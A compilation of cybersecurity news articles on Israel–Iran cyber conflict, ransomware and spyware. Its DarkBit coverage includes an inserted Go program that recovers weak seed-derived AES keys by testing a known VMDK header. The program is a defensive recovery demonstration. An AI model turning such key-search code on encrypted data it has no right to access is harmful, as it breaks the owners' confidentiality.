
Profero Cracks DarkBit Ransomware Encryption After Israel-Iran Cyberattack Links


Cybersecurity company Profero managed to break the encryption scheme used by the DarkBit ransomware group, allowing victims to restore their systems without having to pay a ransom. This achievement came during a 2023 incident response investigation, when Profero was called in to assist a client whose VMware ESXi servers had been locked by the malware. 

The timing of the breach coincided with escalating tensions between Israel and Iran, following drone strikes on an Iranian Defense Ministry weapons facility, raising suspicions that the ransomware attack had political motivations. The attackers behind the campaign claimed to represent DarkBit, a group that had previously posed as pro-Iranian hacktivists and had targeted Israeli universities. Their ransom messages included strong anti-Israel rhetoric and demanded payments amounting to 80 Bitcoin. 

Israel’s National Cyber Command later attributed the operation to MuddyWater, a well-known Iranian state-backed advanced persistent threat group that has a history of conducting espionage and disruption campaigns. Unlike conventional ransomware operators who typically pursue ransom negotiations, the DarkBit actors appeared less concerned with money and more focused on causing business disruption and reputational harm, signaling motivations that aligned with state-directed influence campaigns. 

When the attack was discovered, no publicly available decryptor existed for DarkBit. To overcome this, Profero researchers analyzed the malware in detail and found flaws in its encryption process. DarkBit used AES-128-CBC keys created at runtime, which were then encrypted with RSA-2048 and appended to each locked file. However, the method used to generate encryption keys lacked randomness. By combining this weakness with encryption timestamps gleaned from file modification data, the researchers were able to shrink the possible keyspace to just a few billion combinations—far more manageable than expected. 

The team further capitalized on the fact that Virtual Machine Disk (VMDK) files, common on ESXi servers, include predictable header bytes. Instead of brute forcing an entire file, they only needed to check the first 16 bytes to validate potential keys. Profero built a custom tool capable of generating key and initialization vector pairs, which they tested against these known file headers in a high-powered computing environment. This method successfully produced valid decryption keys that restored locked data. 

At the same time, Profero noticed that DarkBit’s encryption technique was incomplete, leaving many portions of files untouched. Since VMDK files are sparse and contain large amounts of empty space, the ransomware often encrypted irrelevant sections while leaving valuable data intact. By carefully exploring the underlying file systems, the team was able to retrieve essential files directly, without requiring full decryption. This dual approach allowed them to recover critical business data and minimize the impact of the attack.  

Researchers noted that DarkBit’s strategy was flawed, as a data-wiping tool would have been more effective at achieving its disruptive aims than a poorly implemented ransomware variant. The attackers’ refusal to negotiate further reinforced the idea that the campaign was intended to damage operations rather than collect ransom payments. Profero has chosen not to release its custom decryptor to the public, but confirmed that it is prepared to help any future victims affected by the same malware.  

The case illustrates how weaknesses in ransomware design can be turned into opportunities for defense and recovery. It also highlights how cyberattacks tied to international conflicts often blur the line between criminal extortion and state-backed disruption, with groups like DarkBit using the guise of hacktivism to amplify their impact.

Experts decoded encryption keys used by DarkBit ransomware gang


Encryption key for Darkbit ransomware

Good news for people affected by the DarkBit ransomware: experts from Profero have cracked the encryption process, allowing victims to recover their files for free without paying any ransom.

However, the company has not yet released the decryptor. The National Cyber Directorate from Israel connected the DarkBit ransomware operation to the Iran-nexus cybercriminal gang called “MuddyWater APT.”

How the attack started

In a 2023 DarkBit ransomware attack, the threat actors encrypted various VMware ESXi servers in what was believed to be retaliation for drone strikes on Iran; Profero was called in to respond. The threat actors did not negotiate the ransom and instead emphasized disrupting operations and damaging the target's reputation.

The gang posed as pro-Iran hackers and had a history of attacking Israeli agencies. In this incident, the gang asked for 80 Bitcoins and had anti-Israel messages in ransom notes. Profero, however, cracked the encryption, allowing free recovery.

How did the experts find out

While studying DarkBit ransomware, experts discovered that its AES-128-CBC key generation gave weak and predictable keys. Profero used file timestamps and the known VMDK header to limit the keyspace to billions of possibilities, making brute force practical.

“We made use of an AES-128-CBC key-breaking harness to test if our theory was correct, as well as a decryptor which would take an encrypted VMDK and a key and IV pair as input to produce the unencrypted file. The harness ran in a high-performance environment, allowing us to speed through the task as quickly as possible, and after a day of brute-forcing, we were successful!” according to the Profero report. 

Persistent effort led to successful decryption

The experts had proven that it was possible and got the key. They continued brute-forcing another VMDK. This method, however, was not scalable for the following reasons:

  • Each VMDK would require a day for the experts to decrypt
  • The harness resides in an HPC environment and is difficult to scale

“While expensive, it ended up being possible. We decided to once again take a look at any potential weaknesses in the crypto,” Profero experts said.

The experts built a tool to enumerate all possible seeds, derive the key and IV pair for each, and match them against the VMDK headers. This allowed them to recover the decryption keys. Profero also took advantage of the sparse VMDK files, where most of the content was left unencrypted because the ransomware only partially encrypted each file. The experts then directly recovered the most needed files, avoiding brute-force decryption for most of the data.
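As an added example (not Profero's harness and not DarkBit's code), the Go program below shows the known-header check that both DarkBit write-ups above describe: key and IV derived from a seed that file modification times can bound, and each candidate key validated by decrypting only the first 16 bytes of a VMDK and comparing them with the expected header. The derivation function, the seed window and the header fields after the real "KDMV" magic are assumptions made for the demonstration.

```go
package main

import (
	"bytes"
	"crypto/aes"
	"crypto/cipher"
	"crypto/sha256"
	"encoding/binary"
	"fmt"
)

// deriveKeyIV is a constructed stand-in for the weak generator described in
// the post: key and IV come purely from a timestamp-like seed, so anyone who
// can bound the seed can enumerate every possible key/IV pair. This is NOT
// DarkBit's actual derivation routine.
func deriveKeyIV(seed int64) (key, iv []byte) {
	var buf [8]byte
	binary.LittleEndian.PutUint64(buf[:], uint64(seed))
	sum := sha256.Sum256(buf[:])
	return sum[:16], sum[16:32]
}

// encryptCBC encrypts whole blocks with AES-128-CBC (no padding, since the
// demonstration only deals in multiples of the block size).
func encryptCBC(key, iv, plaintext []byte) ([]byte, error) {
	block, err := aes.NewCipher(key)
	if err != nil {
		return nil, err
	}
	if len(plaintext)%aes.BlockSize != 0 {
		return nil, fmt.Errorf("plaintext length %d is not a multiple of %d", len(plaintext), aes.BlockSize)
	}
	out := make([]byte, len(plaintext))
	cipher.NewCBCEncrypter(block, iv).CryptBlocks(out, plaintext)
	return out, nil
}

// decryptFirstBlock decrypts only the first 16 bytes: that is all a
// known-header check needs, so each candidate key costs one block operation
// instead of a whole-file decryption.
func decryptFirstBlock(key, iv, ciphertext []byte) ([]byte, error) {
	block, err := aes.NewCipher(key)
	if err != nil {
		return nil, err
	}
	if len(ciphertext) < aes.BlockSize {
		return nil, fmt.Errorf("ciphertext shorter than one block")
	}
	out := make([]byte, aes.BlockSize)
	cipher.NewCBCDecrypter(block, iv).CryptBlocks(out, ciphertext[:aes.BlockSize])
	return out, nil
}

// recoverSeed walks every seed in [mtime-window, mtime] and returns the one
// whose key/IV pair turns the first ciphertext block back into the known
// header. The file's modification time bounds the search, as in the post.
func recoverSeed(ciphertext, knownHeader []byte, mtime, window int64) (int64, bool) {
	for seed := mtime - window; seed <= mtime; seed++ {
		key, iv := deriveKeyIV(seed)
		pt, err := decryptFirstBlock(key, iv, ciphertext)
		if err == nil && bytes.Equal(pt, knownHeader) {
			return seed, true
		}
	}
	return 0, false
}

// sampleVMDKHeader is a constructed 16-byte prefix of a sparse VMDK extent
// header: the real "KDMV" magic followed by assumed version/flags/capacity
// fields. Only the fact that the bytes are predictable matters here.
func sampleVMDKHeader() []byte {
	h := make([]byte, 16)
	copy(h[0:4], "KDMV")
	binary.LittleEndian.PutUint32(h[4:8], 1)   // version (assumed)
	binary.LittleEndian.PutUint32(h[8:12], 3)  // flags (assumed)
	binary.LittleEndian.PutUint32(h[12:16], 0) // low half of capacity (assumed)
	return h
}

func main() {
	header := sampleVMDKHeader()
	const trueSeed = int64(1700000000) // constructed: when the key was generated
	key, iv := deriveKeyIV(trueSeed)
	// Header plus one filler block stands in for the start of a locked VMDK.
	locked := append(append([]byte{}, header...), bytes.Repeat([]byte{0x41}, 16)...)
	ct, _ := encryptCBC(key, iv, locked)
	// The file was last written a few seconds after the key was made, so search
	// a one-hour window that ends at the observed mtime.
	mtime := trueSeed + 5
	if seed, ok := recoverSeed(ct, header, mtime, 3600); ok {
		fmt.Printf("recovered seed %d by checking only the first block\n", seed)
	} else {
		fmt.Println("no seed in the window reproduced the header")
	}
}
```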

International Criminal Court Hit by Advanced Cyber Attack, No Major Damage


Swift discovery helped the ICC

Last week, the International Criminal Court (ICC) announced that it had discovered a new advanced and targeted cybersecurity incident. Its response mechanism and prompt discovery helped to contain the attack. 

The ICC did not provide details about the attackers' intentions, any data leaks, or other compromises. According to the statement, the ICC, which is headquartered in The Hague, the Netherlands, is conducting a threat evaluation after the attack and taking measures to address any impact. Details about the impact were not provided.

Collective effort against threat actors

The constant support of nations that have ratified the Rome Statute helps the ICC in ensuring its capacity to enforce its mandate and commitment, a responsibility shared by all States Parties. “The Court considers it essential to inform the public and its States Parties about such incidents as well as efforts to address them, and calls for continued support in the face of such challenges,” ICC said. 

The ICC was founded in 2002 through the Rome Statute, an international treaty adopted by a coalition of sovereign states, to create an international court that would prosecute individuals for international crimes: war crimes, genocide, terrorism, and crimes against humanity. The ICC is a separate body from the U.N. International Court of Justice, which hears cases against countries rather than individuals.

Similar attack in 2023

In 2023, the ICC reported another cybersecurity incident. The attack was said to be an act of espionage and aimed at undermining the Court’s mandate. The incident had caused it to disconnect its system from the internet. 

In the past, the ICC has said that it had experienced increased security concerns as threats against its various elected officials rose. “The evidence available thus far indicates a targeted and sophisticated attack with the objective of espionage. The attack can therefore be interpreted as a serious attempt to undermine the Court's mandate," ICC said. 

Recent notable arrest warrants issued by the ICC include those for Russian President Vladimir Putin and Israeli Prime Minister Benjamin Netanyahu.

Tech Ventures: Israel Advances in Crypto Ecosystem


Israel, often known as the "Startup Nation," has emerged as a global leader in cybersecurity, defense, and internet technologies. Cryptocurrency has easily integrated into the high-tech ecosystem, transforming the digital asset class and blockchain technology into key drivers of the country's economic growth. 

Bitcoin ETFs: The Game Changer

In January 2024, when the Securities and Exchange Commission approved various Bitcoin ETFs in the United States, the worldwide crypto market had a 70% price increase, bringing more than $11 billion into the industry. BTC ETF options for US markets were announced in November 2024, resulting in increased retail and institutional investor inflows into the crypto markets. This contributed to the global crypto bull run.  

Blockaid, Ingonyama, Tres, Oobit, and Fordefi are all part of Israel's cryptocurrency ecosystem. In January 2024, Israel had 24 "unicorns". These are private enterprises worth more than $1 billion.  Then there's Starkware, a leader in the Ethereum scaling field, which has reached a $20 billion valuation since the creation of the $STARK token. 

According to a recent yearly assessment, Tel Aviv has the fifth most attractive startup ecosystem in the world. Despite geopolitical uncertainties, the crypto community will undoubtedly keep growing. These are cryptocurrency enthusiasts, after all.

Israel and Tech Startup Landscape

Israel has traditionally inspired the technology sector, so it was logical that the blockchain would find its place here. The country has a strong emphasis on education, research, and development, as well as a surplus of technical skills. 

Tech founders found an unlikely ally in military intelligence, which has helped develop entrepreneurs and facilitate their cryptocurrency investments. Unit 8200 is deeply involved in the cryptocurrency world, and its alumni have joined and established successful firms, bringing government ties, extensive cybersecurity knowledge, and a well-rounded computer education to the blockchain. The Mamram Blockchain Incubator is also associated with the IDF's Centre for Computing and Information Systems.

Tech Revolution in Israel

The Israeli government has contributed to the digital revolution by publicly experimenting with one of the world's first Central Bank Digital Coins. In 2021, the government released the first prototype of the Digital Shekel, and the Bank of Israel recently announced a Digital Shekel Challenge to investigate potential CBDC uses.

The country is also investing in supercomputer technology to compete in the Artificial Intelligence arms race and keep its position at the forefront of the tech start-up scene. 

Iran Spies on Senior Israeli Officials, Launches Over 200 Cyberattacks


Shin Bet, Israel's security service, said recently that it discovered over 200 Iranian phishing attempts targeting top Israeli officials to obtain personal information. Shin Bet believes the attacks were launched by Iranian actors through Telegram, WhatsApp, and email.

The threat actors tried to bait targets into downloading infected apps that would give them access to victim devices and leak personal data like location history and residential addresses.

Iran Targeting Israeli Officials

The targeted senior officials include academics, politicians, media professionals, and others.

Shin Bet said the stolen information would be used by Iran to launch attacks against Israeli nationals “through Israeli cells they have recruited within the country.” The targets were approached with an “individually tailored cover story for each victim according to their area of work, so the approach doesn’t seem suspicious.”

In one case, the attacker disguised as a Cabinet Secretary lured the target saying he wanted to coordinate with PM Benjamin Netanyahu. Shin Bet has tracked the targets involved in the campaign and informed them about the phishing attempts. 

“This is another significant threat in the campaign Iran is waging against Israel, aimed at carrying out assassination attacks. We request heightened awareness, as cyberattacks of this type can be avoided before they happen through awareness, caution, suspicion, and proper preventative behavior online,” said a Shin Bet official.

Reasons for attack

Shin Bet “will continue to act to identify Iranian activity and thwart it in advance.” It believes the motive behind the attacks was to manage future attacks on Israeli nationals using information given by Israeli cells recruited by Iran. The campaign is a sign of an escalation between Iran and Israel, the end goal being assassination attempts.

The bigger picture

The recent discovery of phishing campaigns is part of larger targeted campaigns against Israel. In September 2024, 7 Jewish Israelis were arrested for allegedly spying on IDF and Israeli security figures for Iran. 

The Times of Israel reports, “Also in September, a man from the southern city of Ashkelon was arrested on allegations that he was smuggled into Iran twice, received payment to carry out missions on behalf of Tehran, and was recruited to assassinate either Israel’s prime minister, defense minister, or the head of the Shin Bet.”

3 Billion Attacks and Counting: The IDF’s Cyber Resilience


The Battlefield: Cloud Computing

Cloud computing has become an integral part of modern military operations. The IDF relies heavily on cloud-based systems from troop management to logistics, communication, and intelligence gathering. These systems allow for flexibility, scalability, and efficient resource allocation. 

However, they also make attractive targets for cyber adversaries seeking to disrupt operations, steal sensitive information, or compromise critical infrastructure.

The Israel Defense Forces' cloud computing network has been subjected to almost three billion cyber attacks since the conflict between Israel and Hamas began on October 7, according to the officer in charge of the military's computer section. However, all of the attacks were detected and did not do any damage.

Col. Racheli Dembinsky, chief of the IDF's Center of Computing and Information Systems (Mamram), disclosed the figure on Wednesday during the "IT for IDF" conference in Rishon Lezion.

According to Dembinsky, the attacks targeted operational cloud computing, which is used by numerous systems that serve troops on the ground during conflict to communicate information and forces' whereabouts.

The Scale of the Threat

Three billion attacks may sound staggering, and indeed it is. These attacks targeted operational cloud computing resources used by troops on the ground during combat. Imagine the strain on the network as thousands of soldiers accessed critical data simultaneously while under fire. Despite this immense pressure, Mamram’s cybersecurity experts managed to fend off every attempt.

Dembinsky did not specify the types of assaults or the level of danger they posed, but she did state that they were all blocked and that no systems were penetrated at any time.

Mamram, the IDF's central computing system unit, is responsible for the infrastructure and defense of the military's remote servers.

Hamas terrorists stormed Israel on October 7, killing over 1,200 people, most of them civilians, and capturing 251. It has also been stated that cyberattacks were launched against Israel on October 7, which Dembinsky corroborated.

The Human Element

While technology played a crucial role, the expertise and dedication of Mamram’s personnel truly made a difference. These cyber warriors worked tirelessly, analyzing attack vectors, identifying vulnerabilities, and devising countermeasures. Their commitment to safeguarding Israel’s digital infrastructure was unwavering.

Since the start of the war, certain cyberattacks have been effective against Israeli civilian computer systems. Iranian-backed hackers targeted the Israel State Archives in November, and it was only recently restored to service. Hackers also successfully targeted the computer systems of the city of Modiin Illit.

The Defense Strategy

Last month, Israel's cyber defense chief, Gaby Portnoy, stated that Iran's cyber attacks have become more active since the commencement of the war, not only against Israel but also against its allies.

GPS Warfare: Ukraine-Israel Tensions Raise Alarms

GPS is used for navigation in almost every device in this age of rapid technological development. Israel may have been involved in recent GPS jamming and spoofing incidents in Ukraine, according to reports that have revealed a worrying trend. These incidents pose a serious threat to the worldwide aviation sector and are a topic of regional concern.

The New York Times recently reported on the growing instances of GPS disruptions in Ukraine, shedding light on the potential involvement of Israeli technology. According to the report, Israel has been accused of jamming and spoofing GPS signals in the region, causing disruptions to navigation systems. The motives behind such actions remain unclear, raising questions about the broader implications of electronic warfare on international relations. 

The aviation sector heavily relies on GPS for precise navigation, making any interference with these systems potentially catastrophic. GPS jamming and spoofing not only endanger flight safety but also have the capacity to disrupt air traffic control systems, creating chaos in the skies.

The implications of these incidents extend beyond the borders of Ukraine and Israel. As the world becomes increasingly interconnected, disruptions in one region can reverberate globally. The international community must address the issue promptly to prevent further escalations and ensure the safe operation of air travel.

Governments, aviation authorities, and technology experts need to collaborate to develop countermeasures against GPS interference. Strengthening cybersecurity protocols and investing in advanced technologies to detect and mitigate electronic warfare threats should be a priority for nations worldwide.

Preserving vital infrastructure, like GPS systems, becomes crucial as we manoeuvre through the complexity of a networked world. The GPS jamming events between Israel and Ukraine serve as a sobering reminder of the gaps in our technology and the urgent necessity for global cooperation to counter new threats in the digital era.

Israeli Cyber Firms Unveil Groundbreaking Spyware Tool


Israeli cybersecurity companies have made an unparalleled spyware tool available, which has shaken the global technology sector. This new breakthrough has sparked discussions about the ethics of such sophisticated surveillance equipment as well as worries about privacy and security.

According to a recent article in Haaretz, the Israeli cyber industry has unveiled a cutting-edge spyware tool that has been dubbed InsaneT. This highly advanced technology reportedly possesses capabilities that make it virtually impervious to existing defense mechanisms. As the article states, "Israeli cyber firms have developed an insane new spyware tool, and no defense exists."

The tool's sophistication has caught the attention of experts and cybersecurity professionals worldwide. It has the potential to reshape the landscape of cyber warfare and espionage, making it both a remarkable achievement and a significant cause for concern.

The InsaneT spyware tool's capabilities remain shrouded in secrecy, but it is said to be capable of infiltrating even the most secure networks and devices, bypassing traditional security measures with ease. Its existence highlights the ever-evolving arms race in the world of cybersecurity, where hackers and defenders constantly vie for the upper hand.

While the Israeli cyber industry boasts about this technological breakthrough, ethical concerns loom large. The Register, in their recent report on InsaneT, emphasizes the need for a robust ethical framework in the development and deployment of such powerful surveillance tools. Privacy advocates and human rights organizations have already expressed their apprehension regarding the potential misuse of this technology.

As the world becomes increasingly interconnected, issues related to cyber espionage and surveillance gain prominence. The introduction of InsaneT raises questions about the balance between national security interests and individual privacy rights. Striking the right balance between these two conflicting priorities remains an ongoing challenge for governments and technology companies worldwide.

An important turning point in the history of cybersecurity was the appearance of the spyware tool InsaneT created by Israeli cyber companies. Considering the ethical and security ramifications of such cutting-edge technology, its unmatched capabilities bring both opportunities and risks, highlighting the necessity of ongoing discussion and international cooperation. Governments, corporations, and individuals must manage the complexity of cybersecurity as we advance in the digital era to ensure that innovation does not compromise privacy and security.


Iranian Attackers Employ Novel Moneybird Ransomware to Target Israeli Organizations

 

A new ransomware variant called "Moneybird" is currently being used by the threat actor "Agrius," which is thought to be funded by the Iranian government, to target Israeli organisations.

Since at least 2021, Agrius has been using various identities to deliberately target organisations in Israel and the Middle East while using data wipers in disruptive attacks. 

Researchers from Check Point who found the new ransomware strain believe that Agrius created it to aid in the growth of their activities, and that the threat group's use of "Moneybird" is just another effort to hide their footprints.

Modus operandi

According to Check Point researchers, threat actors first acquire access to company networks by taking advantage of flaws in servers that are visible to the public, giving Agrius its first network footing. 

The hackers then conceal themselves behind Israeli ProtonVPN nodes to launch ASPXSpy webshell variations concealed inside "Certificate" text files, a strategy Agrius has employed in the past. 

After deploying the webshells, the attackers employ open-source tools to move laterally, communicate securely using Plink/PuTTY, steal credentials using ProcDump, and exfiltrate data using FileZilla. These tools include SoftPerfect Network Scanner, Plink/PuTTY, ProcDump, and FileZilla.

The Moneybird ransomware executable is obtained by Agrius in the subsequent stage of the attack through reliable file hosting services like 'ufile.io' and 'easyupload.io.'

The C++ ransomware strain encrypts target files using AES-256 in GCM (Galois/Counter Mode), creating a distinct encryption key for each file and appending encrypted metadata to the end of each one. This process begins immediately after the ransomware executable is launched.

In the instances observed by Check Point, the ransomware only targeted "F:User Shares," a typical shared folder on business networks used to hold company records, databases, and other items pertaining to collaboration.

This focused targeting suggests that Moneybird is more interested in disrupting business than in locking down the affected machines. 

Since the private keys used to encrypt each file are produced using information from the system GUID, file content, file path, and random integers, Check Point argues that data restoration and file decryption would be incredibly difficult.

Following the encryption, ransom notes are left on the affected systems, advising the victim to click the provided link within 24 hours for instructions on data recovery. 

"Hello WE ARE MONEYBIRD! All of your data encrypted! If u want you to restore them follow this link with in 24H," reads the Moneybird ransom note. 

Moneybird is thought to be ransomware, not a wiper, in contrast to earlier assaults connected to Agrius, and it is intended to generate money to support the threat actors' nefarious activities. 

However, in the case observed by Check Point Research, the ransom demand was so high that it was understood from the beginning that a payment would probably not be made, effectively rendering the attack harmful. 

"Yes negotiations could be possible but the demand was extremely high, which leads us to believe that it’s part of the trick. They knew no one would pay so the damage and data leaked was expected. It was not a wiper," stated Eli Smadga, Research Group Manager at Check Point Research.

An easy-to-use but powerful ransomware 

According to Check Point, Moneybird relies on an embedded configuration blob rather than command-line parsing, which would have allowed victim-specific customisation and more flexible deployment.

Because the ransomware's behaviour parameters are pre-defined and difficult to customise for each target or situation, the strain is unsuited to large-scale campaigns.

But for Agrius, Moneybird remains a powerful instrument for business disruption, and future advancements that result in the release of newer, more powerful versions may make it a serious danger to a wider variety of Israeli organisations.

Upper Galilee Irrigation Systems Crippled by Cyberattack

 


There have been reports of several water controllers malfunctioning on Sunday due to a cyberattack targeting the monitoring systems that oversee irrigation and wastewater treatment systems.

It has been found that specific water controllers used to irrigate fields in the Jordan Valley, as well as the Galil Sewage Corporation's sewage control system, were damaged as a result. 

To resolve the issue and restore performance to the systems in both major domains, managers of both major systems pushed their teams to work Sunday morning on the issue. There is no information about the source of the cyberattack. 

Information About Cyberattacks 

It was reported several days earlier that a cyberattack was planned in the region. In the wake of the warning, some farmers switched their irrigation systems to manual operation and disconnected the remote control option.

As a result, they were not harmed by the attack. According to a report from Cybersecurity Week, many users who left their systems on remote control had their systems compromised.

The National Cyber Organization alerted the public last week that anti-Israeli cyber attackers were putting up more attacks throughout Ramadan due to the fasting season. The past week was full of massive cyberattacks against Israeli media organizations, medical websites, government websites, and university websites. There were many holidays observed during this time, including Passover. 

According to Ofer Barnea, chief executive officer of the Upper Galilee Agriculture Company, Israel Hayom reported that the company was notified of a potential cyberattack three days earlier. Farmers were instructed to disconnect the controllers and to make contact with the company. Some had not disconnected them by Sunday morning; although they insisted the controllers had been disabled, the controllers were still active. The total number of victims is seven. The farmers told the directorate that they could not access their controllers.

The Israeli Postal Company announced on Sunday that some services would not be available on April 5, the first night of Passover, due to a cyberattack. 

Every April, a group of hackers gathers for OpIsrael, an annual one-day hacking event committed to harming Israel's critical infrastructure. Several companies and entities have been hit by attacks that form part of this event.

The Hula Valley region is being targeted by hacking groups that go after thousands of water controllers. Beyond simply causing panic and fear, this attack has a direct physical impact on agricultural areas.

FBI Nearly Adopted NSO's Spyware

According to a report published by the New York Times on Saturday, several agents from the US Federal Bureau of Investigation worked to enhance the rollout of Pegasus, the notorious phone-hacking program created by Israel's NSO Group. 

What is Pegasus?

Once installed, Pegasus spyware enables the user to fully manage a target's phone, allowing them to see messages, listen in on calls, and access the phone as a remote listening device.

Significant numbers of human rights activists, journalists, politicians, and corporate executives were reportedly designated as potential targets of NSO's Pegasus program, which has caused criticism for the Israeli company responsible for its development. 

When smartphones are infected with Pegasus, they effectively become portable surveillance tools that can be used to read the target's messages, browse through the images, or even switch on the user's camera and microphone secretly.

FBI Purchased Pegasus 

The highly classified files, which were provided to the Times in response to a FOIA request, reveal that agency officials had developed guidelines for federal prosecutors on how to disclose Pegasus usage in court proceedings and were in the process of organizing briefings for FBI leadership on the malware.

Additionally, the FBI asserted that Pegasus had never been used to assist an FBI investigation. The FBI only obtained a restricted license for product testing and evaluation, the statement read "There was no functional use in support of any investigation."

The announcement represents a clear admission by the FBI that it purchased Pegasus, one of the most advanced hacking tools in existence.

The FBI examined NSO's Phantom software, which has the ability to hack US phones, earlier this year, the press reported. After learning that NSO's hackers were linked to violations of human rights all around the world and as negative press about the technology spread, the FBI eventually opted against utilizing it.

The New York Times broke the news of the FBI's acquisition of Pegasus in 2019 while the Trump administration was in control. However, the bureau has still not ruled out the potential of using comparable technology in the future, the report said, citing recent court records.

A legal brief submitted on the bureau's behalf last month stated that "just because the FBI eventually decided not to deploy the tool in support of criminal investigations does not mean it would not test, evaluate, and potentially deploy other similar tools for gaining access to encrypted communications used by criminals."



Iranian Hackers: Israeli Tourism Sites Targeted

An attack took down the websites of the Israeli public transportation companies Dan and Kavim, a children's museum, and a public radio blog. Reportedly, none of the sites were reachable by Saturday noon.

On Tuesday, the Sharp Boys hacking group claimed to have stolen data from Israeli travel websites, including ID numbers, addresses, and credit card details.

Websites were compromised 

According to the hackers, the affected websites are hotels.co.il, isrotel.com, minihotel.co.il, tivago.co.il, and danhotels.com. On Tuesday morning hotels.co.il was inaccessible, according to the company, but by Tuesday afternoon the site was loading again. 

"Hello once more! If you don't want your data disclosed by us, contact us as soon as possible," the hackers posted on Telegram on Friday night. A follow-up message stated: "They did not get in touch with us, the first list of data is here," and the group posted the data online.

Later on Saturday, in a new message claiming to hold more data, the gang uploaded what it said was information about customers of the Dan transportation company and a travel agency. "You are under our control no matter where you go, even on your travels. Please keep our name in mind," Sharp Boys wrote in an image shared on a Telegram account. 

Everything to know about Sharp Boys cyber gang

According to Israeli media, Sharp Boys is a hacking group with links to Iran that combines data theft and extortion with cyber espionage. 

The Sharp Boys hacker group first appeared in December, when it claimed to have compromised two Israeli hiking websites. It also claimed to have taken control of the sites' backend administration and released a spreadsheet containing the personal data of 120,000 people. 

In December last year, the group broke into the Israeli insurance company Shirbit and stole large volumes of data. When the company declined to pay the $1 million ransom demand, the group leaked the data, releasing a spreadsheet that contained personal data and credit card details for 100,000 people.

According to a report released on Tuesday by the Israeli cybersecurity firm Check Point, the average weekly number of attacks on businesses in the travel and leisure industry rose globally by 60% in June 2022 compared with the first half of June 2021.

An Israeli Spy Agency, QuaDream, Hacks Devices 

 

According to Reuters, an Apple software flaw that the Israeli spyware firm NSO Group exploited to break into iPhones in 2021 was also being exploited by a competitor at the same time. 

That competitor, QuaDream, had likewise gained the ability to remotely compromise iPhones without the user clicking on a malicious link. The fact that two firms independently employed the same advanced 'zero-click' technique suggests that smartphones are more exposed to digital espionage than the industry admits. 

Both companies used the ForcedEntry exploit to compromise iPhones. For context, an exploit is a piece of code that takes advantage of one or more specific software flaws to give an attacker unauthorized access to a device or its data. 

"People want to feel they're safe, and telecommunications companies want the user to assume they're safe," stated Dave Aitel, a cybersecurity partner at Cordyceps Systems. 

Some notable Israelis have been attacked with Pegasus, according to a recent revelation from the Israeli publication Calcalist, including a son of former Prime Minister Benjamin Netanyahu. "CEOs of government ministries, news reporters, tycoons, corporate executives, mayors, social activists, and even the Prime Minister's relatives were all police targets," according to Calcalist. "Phones were hacked by NSO's spyware prior to any research even opening and without any judicial authorization." 

Some of QuaDream's clients overlapped with NSO Group's, implying that those buyers used both Pegasus and REIGN for surveillance, in particular against political opponents. The two tools' techniques were so similar that when Apple patched the underlying flaw, both were neutralized at once. 

Spyware firms have long claimed to sell high-powered technologies to assist governments in combating national security threats. Human rights organizations and journalists, on the other hand, have reported the use of spyware to harm civil society, discredit political opposition, and sabotage elections on numerous occasions. 

Pegasus was also recently discovered on the devices of Finnish diplomats posted abroad, according to Finnish officials, as part of a wide-ranging espionage campaign. Pegasus was also allegedly installed on the iPhones of at least nine US State Department employees.

Iran-Linked Hackers Attacked Israel's Government and Business Sector

 

In the latest episode of cyberwarfare between the rival states, an Iran-linked hacking gang hit seven Israeli targets in a 24-hour span, according to an Israeli cybersecurity firm. The Israeli "government and business sector" were among the targets of the "Charming Kitten" attack, according to a statement issued late Wednesday by Tel Aviv-based Check Point. 

"Check Point has blocked these attacks, as we witnessed communications between a server used by this group and the targets in Israel," said the firm. "Our reports of the last 48 hours prove that both criminal hacking groups and nation-state actors are engaged in the exploration of this vulnerability."

Charming Kitten, also known as Phosphorus, APT35, Ajax Security Team, ITG18, NewsBeef, and NewsCaster, is a threat actor active since at least 2011 that has targeted entities in the Middle East, the United States, and the United Kingdom. FireEye classified the group as a nation-state advanced persistent threat on December 15, 2017, despite its relative lack of sophistication. FireEye research in 2018 suggested that APT35 was expanding its malware capabilities and intrusion campaigns. Since then, the group has been known to use phishing pages that spoof company websites, as well as fake accounts and look-alike DNS domains, to steal victims' passwords. 

Allegations of cyberwarfare between Iran and Israel have grown more serious in recent months. In October, Israel was implicated in a series of cyberattacks on Iranian infrastructure, including the country's fuel distribution system. The disruption had an unusual impact because it shut down the IT system that allowed Iranians to fill their tanks for free or at reduced prices using a digital card issued by the authorities.

Another reportedly Iran-linked hacker organization, "Black Shadow," claimed responsibility for a cyber-attack on an Israeli internet service provider in October. One of the sites targeted in that incident was Israel's largest LGBTQ dating service, with the hackers demanding ransom payments in exchange for sensitive private information such as the HIV status of the site's users. 

According to the finance ministry, Israel, which prides itself on being a cybersecurity leader, hosted an "international cyber financial war game" last week. Participants included the United States, Britain, and the United Arab Emirates, which established diplomatic ties with Israel last year; Germany, Switzerland, and the International Monetary Fund were also present, according to the ministry. Shira Greenberg, chief economist at Israel's finance ministry, said the exercise underlined "the importance of coordinated global action by governments and central banks in the face of cyber-financial threats."

Israeli Company Spyware Targets US Department Phones

 

According to four people familiar with the matter, the iPhones of at least nine U.S. State Department employees were compromised by an unidentified attacker using advanced spyware produced by the Israel-based NSO Group. 

The attacks, which occurred in the previous few months, targeted U.S. officials who were either based in Uganda or focused on issues about the East African country, according to two of the sources. 

The attacks, first reported by Reuters, are the most extensive known hacks of US officials using NSO technology. Earlier reporting on NSO had surfaced a database of potential target numbers that included some American officials, though it was unclear whether intrusions were actually attempted or succeeded. 

NSO Group said in a statement that it had no indication its tools had been used, but that it had cancelled access for the relevant customers and would investigate. 

"If our investigation shall show these actions indeed happened with NSO's tools, such customer will be terminated permanently and legal actions will take place," said an NSO spokesperson, who added that NSO will also "cooperate with any relevant government authority and present the full information we will have." 

NSO has always maintained that it sells its products exclusively to government law enforcement and intelligence agencies to help them address security threats, and that it is not involved in its customers' surveillance operations. 

A State Department official declined to comment on the intrusions and pointed to the Commerce Department's recent decision to place the Israeli company on its Entity List, which makes it harder for US businesses to do business with it. 

NSO Group and another spyware firm were "added to the Entity List based on a determination that they developed and supplied spyware to foreign governments that used this tool to maliciously target government officials, journalists, business people, activists, academics, and embassy workers," the Commerce Department said in an announcement last month. 

According to product instructions reviewed by Reuters, the NSO application is capable of not just stealing encrypted messages, images, and other confidential material from compromised phones, but also turning them into recording devices to watch their surroundings. 

Apple's advisory to affected users did not name the developer of the spyware used in this hack. According to two of the people alerted by Apple, the victims included American residents who were easily identifiable as U.S. government officials because they had paired email addresses ending in state.gov with their Apple IDs. 

According to the sources, they and other victims alerted by Apple in multiple countries have been affected by the same graphics processing vulnerability. 

The Israeli embassy in Washington stated in a statement that targeting American officials would be a major violation of its norms. 

